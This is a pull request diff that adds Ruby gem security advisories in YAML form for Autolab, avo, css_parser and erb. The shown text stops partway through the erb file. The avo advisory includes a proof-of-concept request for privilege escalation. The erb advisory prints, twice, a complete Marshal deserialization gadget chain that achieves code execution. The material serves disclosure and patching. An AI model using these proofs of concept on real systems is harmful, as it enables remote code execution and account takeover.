### PR TITLE
GHSA/SYNC: 16 new gem advisories

### DIFF
--- a/gems/Autolab/CVE-2024-49376.yml
+++ b/gems/Autolab/CVE-2024-49376.yml
@@ -1,0 +1,76 @@
+---
+gem: Autolab
+cve: 2024-49376
+ghsa: v46j-h43h-rwrm
+url: https://github.com/autolab/Autolab/security/advisories/GHSA-v46j-h43h-rwrm
+title: Autolab Misconfigured Reset Password Permissions
+date: 2024-10-25
+description: |
+  ### Impact
+  For email-based accounts, users with insufficient privileges could reset and theoretically access privileged users' accounts by resetting their passwords.
+
+  ### Patches
+  This is fixed in v3.0.1.
+
+  ### Workarounds
+  No workarounds.
+
+  ### For more information
+  If you have any questions or comments about this advisory:
+
+  Open an issue in https://github.com/autolab/Autolab/
+  Email us at [autolab-dev@andrew.cmu.edu](mailto:autolab-dev@andrew.cmu.edu)
+cvss_v3: 8.8
+cvss_v4: "<FILL IN IF AVAILABLE>"
+unaffected_versions:
+- "< 3.0.0"
+patched_versions:
+- ">= 3.0.1"
+related:
+  url:
+  - https://github.com/autolab/Autolab/security/advisories/GHSA-v46j-h43h-rwrm
+  - https://nvd.nist.gov/vuln/detail/CVE-2024-49376
+  - https://github.com/autolab/Autolab/commit/301689ab5c5e39d13bab47b71eaf8998d04bcc9b
+  - https://github.com/advisories/GHSA-v46j-h43h-rwrm
+# GitHub advisory data below - **Remove this data before committing**
+# Use this data to write patched_versions (and potentially unaffected_versions) above
+---
+identifiers:
+- type: GHSA
+  value: GHSA-v46j-h43h-rwrm
+- type: CVE
+  value: CVE-2024-49376
+summary: Autolab Misconfigured Reset Password Permissions
+description: |
+  ### Impact
+  For email-based accounts, users with insufficient privileges could reset and theoretically access privileged users' accounts by resetting their passwords.
+
+  ### Patches
+  This is fixed in v3.0.1.
+
+  ### Workarounds
+  No workarounds.
+
+  ### For more information
+  If you have any questions or comments about this advisory:
+
+  Open an issue in https://github.com/autolab/Autolab/
+  Email us at [autolab-dev@andrew.cmu.edu](mailto:autolab-dev@andrew.cmu.edu)
+severity: HIGH
+cvss:
+  score: 8.8
+  vectorString: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+references:
+- url: https://github.com/autolab/Autolab/security/advisories/GHSA-v46j-h43h-rwrm
+- url: https://nvd.nist.gov/vuln/detail/CVE-2024-49376
+- url: https://github.com/autolab/Autolab/commit/301689ab5c5e39d13bab47b71eaf8998d04bcc9b
+- url: https://github.com/advisories/GHSA-v46j-h43h-rwrm
+publishedAt: '2024-10-25T19:21:43Z'
+withdrawnAt:
+vulnerabilities:
+- package:
+    name: Autolab
+    ecosystem: RUBYGEMS
+  vulnerableVersionRange: "= 3.0.0"
+  firstPatchedVersion:
+    identifier: 3.0.1

--- a/gems/avo/CVE-2026-42205.yml
+++ b/gems/avo/CVE-2026-42205.yml
@@ -1,0 +1,188 @@
+---
+gem: avo
+cve: 2026-42205
+ghsa: qc5p-3mg5-9fh8
+url: https://github.com/avo-hq/avo/security/advisories/GHSA-qc5p-3mg5-9fh8
+title: 'Avo: Broken Access Control Through Unauthorized Execution of Arbitrary Action
+  Classes Across Resources'
+date: 2026-04-24
+description: |-
+  ### Summary
+
+  A critical Broken Access Control vulnerability was identified in the `ActionsController` of the Avo framework (v3.x). Due to insecure action lookup logic, an authenticated user can execute any Action class (descendants of `Avo::BaseAction`) on any resource, even if the action is not registered for that specific resource. This leads to Privilege Escalation and unauthorized data manipulation across the entire application.
+
+  ### Details
+
+  The vulnerability exists in the `action_class` method within `app/controllers/avo/actions_controller.rb`.
+
+  #### Vulnerable Code
+
+  ```ruby
+  def action_class
+    # It searches through ALL descendants of BaseAction without resource validation
+    Avo::BaseAction.descendants.find do |action|
+      action.to_s == params[:action_id]
+    end
+  end
+  ```
+
+  The controller identifies the action class to execute solely based on the `params[:action_id]` by searching through all `BaseAction` descendants. It fails to verify whether the requested action is actually permitted or registered for the resource context specified in the request URL (e.g., `/admin/resources/posts/actions`).
+
+  Consequently, an attacker can invoke sensitive actions (e.g., `Avo::Actions::ToggleAdmin`) through an unrelated resource endpoint (e.g., `Post`), bypassing the intended resource-action mapping.
+
+  ### Impact
+
+  This flaw results in significant security risks:
+
+  - **Privilege Escalation:** An authenticated user with low privileges can execute administrative actions (like toggling admin roles) to escalate their own or others' permissions.
+  - **Unauthorized Operations:** Actions designed for restricted resources can be triggered against any record ID in the database.
+  - **Data Integrity Compromise:** Attackers can perform unauthorized destructive operations (e.g., Delete, Archive, or Update) on records they should not have access to.
+
+  ### Proof of Concept (PoC)
+
+  **Steps to Reproduce:**
+
+  01. Log in to the Avo admin panel with limited permissions.
+  02. Identify a target record ID (e.g., User ID: 1) and a sensitive action class (e.g., `Avo::Actions::ToggleAdmin`).
+  03. Send a POST request to a resource endpoint where the target action is not registered:
+      - **URL:** `POST /admin/resources/posts/actions`
+      - **Payload:** `action_id=Avo::Actions::ToggleAdmin&fields[avo_resource_ids]=1`
+  04. The server executes the `ToggleAdmin` logic on User 1, even though the request was made through the `posts` resource context.
+
+  **PoC Script Snippet:**
+
+  ```python
+  # Simulating the unauthorized action execution
+  data = {
+      'action_id': 'Avo::Actions::ToggleAdmin',
+      'fields[avo_resource_ids]': '1', # Target Record ID
+      'authenticity_token': csrf_token
+  }
+  response = session.post(f"{BASE_URL}/admin/resources/posts/actions", data=data)
+  ```
+
+  ### Remediation
+
+  Restrict the action lookup to only those actions explicitly registered for the current resource context:
+
+  ```ruby
+  def action_class
+    # Validate that the action is registered for the current resource
+    @resource.get_actions.find do |action|
+      action.to_s == params[:action_id]
+    end
+  end
+  ```
+
+  ### Discoverer
+
+  Illunight
+cvss_v3: 8.8
+cvss_v4: "<FILL IN IF AVAILABLE>"
+patched_versions:
+- ">= 3.31.2"
+related:
+  url:
+  - https://github.com/avo-hq/avo/security/advisories/GHSA-qc5p-3mg5-9fh8
+  - https://nvd.nist.gov/vuln/detail/CVE-2026-42205
+  - https://github.com/avo-hq/avo/releases/tag/v3.31.2
+  - https://github.com/advisories/GHSA-qc5p-3mg5-9fh8
+# GitHub advisory data below - **Remove this data before committing**
+# Use this data to write patched_versions (and potentially unaffected_versions) above
+---
+identifiers:
+- type: GHSA
+  value: GHSA-qc5p-3mg5-9fh8
+- type: CVE
+  value: CVE-2026-42205
+summary: 'Avo: Broken Access Control Through Unauthorized Execution of Arbitrary Action
+  Classes Across Resources'
+description: |-
+  ### Summary
+
+  A critical Broken Access Control vulnerability was identified in the `ActionsController` of the Avo framework (v3.x). Due to insecure action lookup logic, an authenticated user can execute any Action class (descendants of `Avo::BaseAction`) on any resource, even if the action is not registered for that specific resource. This leads to Privilege Escalation and unauthorized data manipulation across the entire application.
+
+  ### Details
+
+  The vulnerability exists in the `action_class` method within `app/controllers/avo/actions_controller.rb`.
+
+  #### Vulnerable Code
+
+  ```ruby
+  def action_class
+    # It searches through ALL descendants of BaseAction without resource validation
+    Avo::BaseAction.descendants.find do |action|
+      action.to_s == params[:action_id]
+    end
+  end
+  ```
+
+  The controller identifies the action class to execute solely based on the `params[:action_id]` by searching through all `BaseAction` descendants. It fails to verify whether the requested action is actually permitted or registered for the resource context specified in the request URL (e.g., `/admin/resources/posts/actions`).
+
+  Consequently, an attacker can invoke sensitive actions (e.g., `Avo::Actions::ToggleAdmin`) through an unrelated resource endpoint (e.g., `Post`), bypassing the intended resource-action mapping.
+
+  ### Impact
+
+  This flaw results in significant security risks:
+
+  - **Privilege Escalation:** An authenticated user with low privileges can execute administrative actions (like toggling admin roles) to escalate their own or others' permissions.
+  - **Unauthorized Operations:** Actions designed for restricted resources can be triggered against any record ID in the database.
+  - **Data Integrity Compromise:** Attackers can perform unauthorized destructive operations (e.g., Delete, Archive, or Update) on records they should not have access to.
+
+  ### Proof of Concept (PoC)
+
+  **Steps to Reproduce:**
+
+  01. Log in to the Avo admin panel with limited permissions.
+  02. Identify a target record ID (e.g., User ID: 1) and a sensitive action class (e.g., `Avo::Actions::ToggleAdmin`).
+  03. Send a POST request to a resource endpoint where the target action is not registered:
+      - **URL:** `POST /admin/resources/posts/actions`
+      - **Payload:** `action_id=Avo::Actions::ToggleAdmin&fields[avo_resource_ids]=1`
+  04. The server executes the `ToggleAdmin` logic on User 1, even though the request was made through the `posts` resource context.
+
+  **PoC Script Snippet:**
+
+  ```python
+  # Simulating the unauthorized action execution
+  data = {
+      'action_id': 'Avo::Actions::ToggleAdmin',
+      'fields[avo_resource_ids]': '1', # Target Record ID
+      'authenticity_token': csrf_token
+  }
+  response = session.post(f"{BASE_URL}/admin/resources/posts/actions", data=data)
+  ```
+
+  ### Remediation
+
+  Restrict the action lookup to only those actions explicitly registered for the current resource context:
+
+  ```ruby
+  def action_class
+    # Validate that the action is registered for the current resource
+    @resource.get_actions.find do |action|
+      action.to_s == params[:action_id]
+    end
+  end
+  ```
+
+  ### Discoverer
+
+  Illunight
+severity: HIGH
+cvss:
+  score: 8.8
+  vectorString: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+references:
+- url: https://github.com/avo-hq/avo/security/advisories/GHSA-qc5p-3mg5-9fh8
+- url: https://nvd.nist.gov/vuln/detail/CVE-2026-42205
+- url: https://github.com/avo-hq/avo/releases/tag/v3.31.2
+- url: https://github.com/advisories/GHSA-qc5p-3mg5-9fh8
+publishedAt: '2026-04-24T16:11:28Z'
+withdrawnAt:
+vulnerabilities:
+- package:
+    name: avo
+    ecosystem: RUBYGEMS
+  vulnerableVersionRange: "< 3.31.2"
+  firstPatchedVersion:
+    identifier: 3.31.2

--- a/gems/css_parser/CVE-2026-44312.yml
+++ b/gems/css_parser/CVE-2026-44312.yml
@@ -1,0 +1,97 @@
+---
+gem: css_parser
+cve: 2026-44312
+ghsa: ff6c-w6qf-7xqc
+url: https://github.com/premailer/css_parser/security/advisories/GHSA-ff6c-w6qf-7xqc
+title: 'CSS Parser: Improper Certificate Validation allows MITM injection of remote
+  CSS content'
+date: 2026-05-07
+description: "### Summary\n\nThe CSS Parser gem does not validate HTTPS connections,
+  allowing a Man-in-the-Middle (MITM) attacker to inject or modify CSS content when
+  stylesheets are loaded via HTTPS. The connection is established with `OpenSSL::SSL::VERIFY_NONE`,
+  meaning any HTTPS certificate—even entirely untrusted—will be accepted without validation.\n\n###
+  Details\n\nIn `lib/css_parser/parser.rb`, the HTTP client sets:\nhttps://github.com/premailer/css_parser/blob/3f91e8db7547fac50ab50cb7f9920f785f722740/lib/css_parser/parser.rb#L646\n\n```ruby\nhttp.verify_mode
+  = OpenSSL::SSL::VERIFY_NONE\n```\n\nAs a result, the library does not validate the
+  authenticity of HTTPS connections and does not protect against man-in-the-middle
+  attacks. Any attacker in a position to intercept network traffic can inject or modify
+  CSS loaded via HTTPS URLs without detection or warning.\n\n### PoC\n\n1. Set up
+  a test Ruby project that uses the CSS Parser gem and loads an external stylesheet
+  over HTTPS.\n2. Use a local proxy (such as mitmproxy or Burp Suite) to intercept
+  outgoing HTTPS requests.\n3. Present a fake self-signed certificate to the client.\n4.
+  Inject custom CSS into the intercepted HTTPS response.\n   \nThe request will succeed
+  and the injected CSS will be delivered to the application, as the connection is
+  not validated.\n\n### References\n \nhttps://github.com/premailer/css_parser/issues/185\n\n###
+  Impact\n\nApplications using CSS Parser to load remote stylesheets over HTTPS are
+  vulnerable to CSS injection and content manipulation, regardless of the trust status
+  of the remote server. All users who use CSS Parser to fetch external CSS over HTTPS
+  may be impacted.\n\n### Credit\n\nThis vulnerability was uncovered by @JLLeitschuh
+  of the @braze-inc security team."
+cvss_v3: 5.8
+cvss_v4: "<FILL IN IF AVAILABLE>"
+patched_versions:
+- "~> 1.22.0"
+- ">= 2.1.0"
+related:
+  url:
+  - https://github.com/premailer/css_parser/security/advisories/GHSA-ff6c-w6qf-7xqc
+  - https://github.com/premailer/css_parser/issues/185
+  - https://github.com/premailer/css_parser/commit/35e689c904225add78e0c488cf04bad052666449
+  - https://github.com/premailer/css_parser/commit/e0c95d5abe91b237becb90ff316531a6547ada18
+  - https://nvd.nist.gov/vuln/detail/CVE-2026-44312
+  - https://github.com/advisories/GHSA-ff6c-w6qf-7xqc
+# GitHub advisory data below - **Remove this data before committing**
+# Use this data to write patched_versions (and potentially unaffected_versions) above
+---
+identifiers:
+- type: GHSA
+  value: GHSA-ff6c-w6qf-7xqc
+- type: CVE
+  value: CVE-2026-44312
+summary: 'CSS Parser: Improper Certificate Validation allows MITM injection of remote
+  CSS content'
+description: "### Summary\n\nThe CSS Parser gem does not validate HTTPS connections,
+  allowing a Man-in-the-Middle (MITM) attacker to inject or modify CSS content when
+  stylesheets are loaded via HTTPS. The connection is established with `OpenSSL::SSL::VERIFY_NONE`,
+  meaning any HTTPS certificate—even entirely untrusted—will be accepted without validation.\n\n###
+  Details\n\nIn `lib/css_parser/parser.rb`, the HTTP client sets:\nhttps://github.com/premailer/css_parser/blob/3f91e8db7547fac50ab50cb7f9920f785f722740/lib/css_parser/parser.rb#L646\n\n```ruby\nhttp.verify_mode
+  = OpenSSL::SSL::VERIFY_NONE\n```\n\nAs a result, the library does not validate the
+  authenticity of HTTPS connections and does not protect against man-in-the-middle
+  attacks. Any attacker in a position to intercept network traffic can inject or modify
+  CSS loaded via HTTPS URLs without detection or warning.\n\n### PoC\n\n1. Set up
+  a test Ruby project that uses the CSS Parser gem and loads an external stylesheet
+  over HTTPS.\n2. Use a local proxy (such as mitmproxy or Burp Suite) to intercept
+  outgoing HTTPS requests.\n3. Present a fake self-signed certificate to the client.\n4.
+  Inject custom CSS into the intercepted HTTPS response.\n   \nThe request will succeed
+  and the injected CSS will be delivered to the application, as the connection is
+  not validated.\n\n### References\n \nhttps://github.com/premailer/css_parser/issues/185\n\n###
+  Impact\n\nApplications using CSS Parser to load remote stylesheets over HTTPS are
+  vulnerable to CSS injection and content manipulation, regardless of the trust status
+  of the remote server. All users who use CSS Parser to fetch external CSS over HTTPS
+  may be impacted.\n\n### Credit\n\nThis vulnerability was uncovered by @JLLeitschuh
+  of the @braze-inc security team."
+severity: MODERATE
+cvss:
+  score: 5.8
+  vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
+references:
+- url: https://github.com/premailer/css_parser/security/advisories/GHSA-ff6c-w6qf-7xqc
+- url: https://github.com/premailer/css_parser/issues/185
+- url: https://github.com/premailer/css_parser/commit/35e689c904225add78e0c488cf04bad052666449
+- url: https://github.com/premailer/css_parser/commit/e0c95d5abe91b237becb90ff316531a6547ada18
+- url: https://nvd.nist.gov/vuln/detail/CVE-2026-44312
+- url: https://github.com/advisories/GHSA-ff6c-w6qf-7xqc
+publishedAt: '2026-05-07T02:06:49Z'
+withdrawnAt:
+vulnerabilities:
+- package:
+    name: css_parser
+    ecosystem: RUBYGEMS
+  vulnerableVersionRange: "< 1.22.0"
+  firstPatchedVersion:
+    identifier: 1.22.0
+- package:
+    name: css_parser
+    ecosystem: RUBYGEMS
+  vulnerableVersionRange: ">= 2.0.0, < 2.1.0"
+  firstPatchedVersion:
+    identifier: 2.1.0

--- a/gems/erb/CVE-2026-41316.yml
+++ b/gems/erb/CVE-2026-41316.yml
@@ -1,0 +1,501 @@
+---
+gem: erb
+cve: 2026-41316
+ghsa: q339-8rmv-2mhv
+url: https://github.com/ruby/erb/security/advisories/GHSA-q339-8rmv-2mhv
+title: ERB has an @_init deserialization guard bypass via def_module / def_method
+  / def_class
+date: 2026-04-24
+description: |-
+  ## Summary
+
+  Ruby 2.7.0 (before ERB 2.2.0 was published on rubygems.org) introduced an `@_init` instance variable guard in `ERB#result` and `ERB#run` to prevent code execution when an ERB object is reconstructed via `Marshal.load` (deserialization). However, three other public methods that also evaluate `@src` via `eval()` were not given the same guard:
+
+  - `ERB#def_method`
+  - `ERB#def_module`
+  - `ERB#def_class`
+
+  An attacker who can trigger `Marshal.load` on untrusted data in a Ruby application that has `erb` loaded can use `ERB#def_module` (zero-arg, default parameters) as a code execution sink, bypassing the `@_init` protection entirely.
+
+  <details>
+
+  ## The @_init Guard
+
+  In `ERB#initialize`, the guard is set:
+
+  ```ruby
+  # erb.rb line 838
+  @_init = self.class.singleton_class
+  ```
+
+  In `ERB#result` and `ERB#run`, the guard is checked before `eval(@src)`:
+
+  ```ruby
+  # erb.rb line 1008-1012
+  def result(b=new_toplevel)
+    unless @_init.equal?(self.class.singleton_class)
+      raise ArgumentError, "not initialized"
+    end
+    eval(@src, b, (@filename || '(erb)'), @lineno)
+  end
+  ```
+
+  When an ERB object is reconstructed via `Marshal.load`, `@_init` is either `nil` (not set during marshal reconstruction) or an attacker-controlled value. Since `ERB.singleton_class` cannot be marshaled, the attacker cannot set `@_init` to the correct value, and `result`/`run` correctly refuse to execute.
+
+  ## The Bypass
+
+  `ERB#def_method`, `ERB#def_module`, and `ERB#def_class` all reach `eval(@src)` without checking `@_init`:
+
+  ```ruby
+  # erb.rb line 1088-1093
+  def def_method(mod, methodname, fname='(ERB)')
+    src = self.src.sub(/^(?!#|$)/) {"def #{methodname}\n"} << "\nend\n"
+    mod.module_eval do
+      eval(src, binding, fname, -1)      # <-- no @_init check
+    end
+  end
+
+  # erb.rb line 1113-1117
+  def def_module(methodname='erb')       # <-- zero-arg call possible
+    mod = Module.new
+    def_method(mod, methodname, @filename || '(ERB)')
+    mod
+  end
+
+  # erb.rb line 1170-1174
+  def def_class(superklass=Object, methodname='result')  # <-- zero-arg call possible
+    cls = Class.new(superklass)
+    def_method(cls, methodname, @filename || '(ERB)')
+    cls
+  end
+  ```
+
+  `def_module` and `def_class` accept zero arguments (all parameters have defaults), making them callable through deserialization gadget chains that can only invoke zero-arg methods.
+
+  ### Method wrapper breakout
+
+  `def_method` wraps `@src` in a method definition: `"def erb\n" + @src + "\nend\n"`. Code inside a method body only executes when the method is called, not when it's defined. However, by setting `@src` to begin with `end\n`, the attacker closes the method definition early. Code after the first `end` executes immediately at `module_eval` time:
+
+  ```ruby
+  # Attacker sets @src = "end\nsystem('id')\ndef x"
+  # After def_method transformation, module_eval receives:
+  #
+  #   def erb
+  #   end
+  #   system('id')    <- executes at eval time
+  #   def x
+  #   end
+  ```
+
+  ---
+
+  ## Proof of Concept
+
+  ### Minimal (ERB only)
+
+  ```ruby
+  require 'erb'
+
+  erb = ERB.allocate
+  erb.instance_variable_set(:@src, "end\nsystem('id')\ndef x")
+  erb.instance_variable_set(:@lineno, 0)
+
+  # ERB#result correctly blocks this:
+  begin
+    erb.result
+  rescue ArgumentError => e
+    puts "result: #{e.message} (blocked by @_init -- correct)"
+  end
+
+  # ERB#def_module does NOT block this -- executes system('id'):
+  erb.def_module
+  # Output: uid=0(root) gid=0(root) groups=0(root)
+  ```
+
+  ### Marshal deserialization (ERB + ActiveSupport)
+
+  When combined with `ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy` as a method dispatch gadget, this achieves RCE via `Marshal.load`:
+
+  ```ruby
+  require 'active_support'
+  require 'active_support/deprecation'
+  require 'active_support/deprecation/proxy_wrappers'
+  require 'erb'
+
+  # --- Build payload (replace proxy class for marshaling) ---
+  real_class = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy
+  ActiveSupport::Deprecation.send(:remove_const, :DeprecatedInstanceVariableProxy)
+  class ActiveSupport::Deprecation
+    class DeprecatedInstanceVariableProxy
+      def initialize(h)
+        h.each { |k, v| instance_variable_set(k, v) }
+      end
+    end
+  end
+
+  erb = ERB.allocate
+  erb.instance_variable_set(:@src, "end\nsystem('id')\ndef x")
+  erb.instance_variable_set(:@lineno, 0)
+  erb.instance_variable_set(:@filename, nil)
+
+  proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new({
+    :@instance => erb,
+    :@method => :def_module,
+    :@var => "@x",
+    :@deprecator => Kernel
+  })
+
+  marshaled = Marshal.dump({proxy => 0})
+
+  # --- Restore real class and trigger ---
+  ActiveSupport::Deprecation.send(:remove_const, :DeprecatedInstanceVariableProxy)
+  ActiveSupport::Deprecation.const_set(:DeprecatedInstanceVariableProxy, real_class)
+
+  # This triggers RCE:
+  Marshal.load(marshaled)
+  # Output: uid=0(root) gid=0(root) groups=0(root)
+  ```
+
+  **Chain:**
+  1. `Marshal.load` reconstructs a Hash with a `DeprecatedInstanceVariableProxy` as key
+  2. Hash key insertion calls `.hash` on the proxy
+  3. `.hash` is undefined -> `method_missing(:hash)` -> dispatches to `ERB#def_module`
+  4. `def_module` -> `def_method` -> `module_eval(eval(src))` -> breakout -> `system('id')`
+
+  **Verified on:** Ruby 3.3.8 / RubyGems 3.6.7 / ActiveSupport 7.2.3 / ERB 6.0.1
+
+
+  </details>
+
+  ## Impact
+  ### Scope
+
+  Any Ruby application that calls `Marshal.load` on untrusted data AND has both `erb` and `activesupport` loaded is vulnerable to arbitrary code execution. This includes:
+
+  - **Ruby on Rails applications that import untrusted serialized data** -- any Rails app (every Rails app loads both ActiveSupport and ERB) using Marshal.load for caching, data import, or IPC
+  - **Ruby tools that import untrusted serialized data** -- any tool using `Marshal.load` for caching, data import, or IPC
+  - **Legacy Rails apps** (pre-7.0) that still use Marshal for cookie session serialization
+
+  ### Severity justification
+
+  The `@_init` guard was the recognized last line of defense against ERB being used as a deserialization gadget. Prior gadget chain research -- including Luke Jahnke's November 2024 Ruby 3.4 chain (nastystereo.com) and vakzz's 2021 Universal Deserialization Gadget -- pursued entirely different approaches (Gem::SpecFetcher, UncaughtThrowError, TarReader+WriteAdapter) without exploring the ERB def_method/def_module path. The `def_module` bypass is simpler and more direct than all previous chains, and was not addressed by the subsequent patches to Ruby 3.4 or RubyGems 3.6.
+
+  This bypass renders the @_init mitigation ineffective across all ERB versions from 2.2.0 through 6.0.3 (latest as of April 2026). Combined with the DeprecatedInstanceVariableProxy gadget (present in all ActiveSupport versions through 7.2.3), this constitutes a universal RCE gadget chain for Ruby 3.2+ applications using Rails.
+
+  <details>
+
+  ### Gadget chain history
+
+  Six generations of Ruby Marshal gadget chains have been discovered (2018-2026). Each bypassed the previous round of mitigations:
+
+  | Year | Chain | Mitigated in |
+  |------|-------|-------------|
+  | 2018 | Gem::Requirement (Luke Jahnke) | RubyGems 3.0 |
+  | 2021 | UDG -- TarReader+WriteAdapter (vakzz) | RubyGems 3.1 |
+  | 2022 | Gem::Specification._load (vakzz) | RubyGems 3.6 |
+  | 2024 | UncaughtThrowError (Luke Jahnke) | Ruby 3.4 patches |
+  | 2024 | Gem::Source::Git#rev_parse | RubyGems 3.6 |
+  | **2026** | **ERB#def_module @_init bypass** | **ERB 6.0.4** |
+
+  </details>
+
+  ## Patches
+
+  The problem has been patched at the following ERB versions. Please upgrade your erb.gem to any one of them.
+
+  * ERB 4.0.3.1, 4.0.4.1, 6.0.1.1, and 6.0.4
+
+  <details>
+
+  Add the `@_init` check to `def_method`. Since `def_module` and `def_class` both delegate to `def_method`, this single change covers all three bypass paths:
+
+  ```ruby
+  def def_method(mod, methodname, fname='(ERB)')
+    unless @_init.equal?(self.class.singleton_class)
+      raise ArgumentError, "not initialized"
+    end
+    src = self.src.sub(/^(?!#|$)/) {"def #{methodname}\n"} << "\nend\n"
+    mod.module_eval do
+      eval(src, binding, fname, -1)
+    end
+  end
+  ```
+
+  </details>
+
+  -----
+cvss_v3: 8.1
+cvss_v4: "<FILL IN IF AVAILABLE>"
+patched_versions:
+- "~> 4.0.3.1"
+- "~> 4.0.4.1"
+- "~> 6.0.1.1"
+- ">= 6.0.4"
+related:
+  url:
+  - https://github.com/ruby/erb/security/advisories/GHSA-q339-8rmv-2mhv
+  - https://nvd.nist.gov/vuln/detail/CVE-2026-41316
+  - https://github.com/advisories/GHSA-q339-8rmv-2mhv
+# GitHub advisory data below - **Remove this data before committing**
+# Use this data to write patched_versions (and potentially unaffected_versions) above
+---
+identifiers:
+- type: GHSA
+  value: GHSA-q339-8rmv-2mhv
+- type: CVE
+  value: CVE-2026-41316
+summary: ERB has an @_init deserialization guard bypass via def_module / def_method
+  / def_class
+description: |-
+  ## Summary
+
+  Ruby 2.7.0 (before ERB 2.2.0 was published on rubygems.org) introduced an `@_init` instance variable guard in `ERB#result` and `ERB#run` to prevent code execution when an ERB object is reconstructed via `Marshal.load` (deserialization). However, three other public methods that also evaluate `@src` via `eval()` were not given the same guard:
+
+  - `ERB#def_method`
+  - `ERB#def_module`
+  - `ERB#def_class`
+
+  An attacker who can trigger `Marshal.load` on untrusted data in a Ruby application that has `erb` loaded can use `ERB#def_module` (zero-arg, default parameters) as a code execution sink, bypassing the `@_init` protection entirely.
+
+  <details>
+
+  ## The @_init Guard
+
+  In `ERB#initialize`, the guard is set:
+
+  ```ruby
+  # erb.rb line 838
+  @_init = self.class.singleton_class
+  ```
+
+  In `ERB#result` and `ERB#run`, the guard is checked before `eval(@src)`:
+
+  ```ruby
+  # erb.rb line 1008-1012
+  def result(b=new_toplevel)
+    unless @_init.equal?(self.class.singleton_class)
+      raise ArgumentError, "not initialized"
+    end
+    eval(@src, b, (@filename || '(erb)'), @lineno)
+  end
+  ```
+
+  When an ERB object is reconstructed via `Marshal.load`, `@_init` is either `nil` (not set during marshal reconstruction) or an attacker-controlled value. Since `ERB.singleton_class` cannot be marshaled, the attacker cannot set `@_init` to the correct value, and `result`/`run` correctly refuse to execute.
+
+  ## The Bypass
+
+  `ERB#def_method`, `ERB#def_module`, and `ERB#def_class` all reach `eval(@src)` without checking `@_init`:
+
+  ```ruby
+  # erb.rb line 1088-1093
+  def def_method(mod, methodname, fname='(ERB)')
+    src = self.src.sub(/^(?!#|$)/) {"def #{methodname}\n"} << "\nend\n"
+    mod.module_eval do
+      eval(src, binding, fname, -1)      # <-- no @_init check
+    end
+  end
+
+  # erb.rb line 1113-1117
+  def def_module(methodname='erb')       # <-- zero-arg call possible
+    mod = Module.new
+    def_method(mod, methodname, @filename || '(ERB)')
+    mod
+  end
+
+  # erb.rb line 1170-1174
+  def def_class(superklass=Object, methodname='result')  # <-- zero-arg call possible
+    cls = Class.new(superklass)
+    def_method(cls, methodname, @filename || '(ERB)')
+    cls
+  end
+  ```
+
+  `def_module` and `def_class` accept zero arguments (all parameters have defaults), making them callable through deserialization gadget chains that can only invoke zero-arg methods.
+
+  ### Method wrapper breakout
+
+  `def_method` wraps `@src` in a method definition: `"def erb\n" + @src + "\nend\n"`. Code inside a method body only executes when the method is called, not when it's defined. However, by setting `@src` to begin with `end\n`, the attacker closes the method definition early. Code after the first `end` executes immediately at `module_eval` time:
+
+  ```ruby
+  # Attacker sets @src = "end\nsystem('id')\ndef x"
+  # After def_method transformation, module_eval receives:
+  #
+  #   def erb
+  #   end
+  #   system('id')    <- executes at eval time
+  #   def x
+  #   end
+  ```
+
+  ---
+
+  ## Proof of Concept
+
+  ### Minimal (ERB only)
+
+  ```ruby
+  require 'erb'
+
+  erb = ERB.allocate
+  erb.instance_variable_set(:@src, "end\nsystem('id')\ndef x")
+  erb.instance_variable_set(:@lineno, 0)
+
+  # ERB#result correctly blocks this:
+  begin
+    erb.result
+  rescue ArgumentError => e
+    puts "result: #{e.message} (blocked by @_init -- correct)"
+  end
+
+  # ERB#def_module does NOT block this -- executes system('id'):
+  erb.def_module
+  # Output: uid=0(root) gid=0(root) groups=0(root)
+  ```
+
+  ### Marshal deserialization (ERB + ActiveSupport)
+
+  When combined with `ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy` as a method dispatch gadget, this achieves RCE via `Marshal.load`:
+
+  ```ruby
+  require 'active_support'
+  require 'active_support/deprecation'
+  require 'active_support/deprecation/proxy_wrappers'
+  require 'erb'
+
+  # --- Build payload (replace proxy class for marshaling) ---
+  real_class = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy
+  ActiveSupport::Deprecation.send(:remove_const, :DeprecatedInstanceVariableProxy)
+  class ActiveSupport::Deprecation
+    class DeprecatedInstanceVariableProxy
+      def initialize(h)
+        h.each { |k, v| instance_variable_set(k, v) }
+      end
+    end
+  end
+
+  erb = ERB.allocate
+  erb.instance_variable_set(:@src, "end\nsystem('id')\ndef x")
+  erb.instance_variable_set(:@lineno, 0)
+  erb.instance_variable_set(:@filename, nil)
+
+  proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new({
+    :@instance => erb,
+    :@method => :def_module,
+    :@var => "@x",
+    :@deprecator => Kernel
+  })
+
+  marshaled = Marshal.dump({proxy => 0})
+
+  # --- Restore real class and trigger ---
+  ActiveSupport::Deprecation.send(:remove_const, :DeprecatedInstanceVariableProxy)
+  ActiveSupport::Deprecation.const_set(:DeprecatedInstanceVariableProxy, real_class)
+
+  # This triggers RCE:
+  Marshal.load(marshaled)
+  # Output: uid=0(root) gid=0(root) groups=0(root)
+  ```
+
+  **Chain:**
+  1. `Marshal.load` reconstructs a Hash with a `DeprecatedInstanceVariableProxy` as key
+  2. Hash key insertion calls `.hash` on the proxy
+  3. `.hash` is undefined -> `method_missing(:hash)` -> dispatches to `ERB#def_module`
+  4. `def_module` -> `def_method` -> `module_eval(eval(src))` -> breakout -> `system('id')`
+
+  **Verified on:** Ruby 3.3.8 / RubyGems 3.6.7 / ActiveSupport 7.2.3 / ERB 6.0.1
+
+
+  </details>
+
+  ## Impact
+  ### Scope
+
+  Any Ruby application that calls `Marshal.load` on untrusted data AND has both `erb` and `activesupport` loaded is vulnerable to arbitrary code execution. This includes:
+
+  - **Ruby on Rails applications that import untrusted serialized data** -- any Rails app (every Rails app loads both ActiveSupport and ERB) using Marshal.load for caching, data import, or IPC
+  - **Ruby tools that import untrusted serialized data** -- any tool using `Marshal.load` for caching, data import, or IPC
+  - **Legacy Rails apps** (pre-7.0) that still use Marshal for cookie session serialization
+
+  ### Severity justification
+
